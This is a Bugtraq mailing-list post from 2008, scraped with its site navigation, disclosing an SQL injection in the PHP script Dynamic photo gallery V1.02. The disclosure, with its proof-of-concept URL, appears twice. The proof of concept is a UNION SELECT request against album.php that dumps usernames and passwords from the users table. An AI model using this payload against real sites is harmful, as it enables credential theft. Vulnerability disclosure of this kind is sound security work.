Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
Dynamic photo gallery V1.02 SQL Injection
Mar 02 2008 03:34AM
no-reply Aria-security net
Aria-Security Team
http://Aria-Security.Net
----------------------------
Shoutz: Aura, imm02rtal, NULL, Kinglet And all our staff
Vendor: http://www.phpwebscript.net/dynamicphotogallery/foto-gallery.php
Original Link: http://forum.aria-security.net/showthread.php?p=1521
PoC:
album.php?slideshow=start&albumID=-4214/**/union/**/select/**/0,username
,password,3,4,5,6,7,8/**/from/**/users
Regards
The-0utl4w
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
http://Aria-Security.Net
----------------------------
Shoutz: Aura, imm02rtal, NULL, Kinglet And all our staff
Vendor: http://www.phpwebscript.net/dynamicphotogallery/foto-gallery.php
Original Link: http://forum.aria-security.net/showthread.php?p=1521
PoC:
album.php?slideshow=start&albumID=-4214/**/union/**/select/**/0,username
,password,3,4,5,6,7,8/**/from/**/users
Regards
The-0utl4w
[ reply ]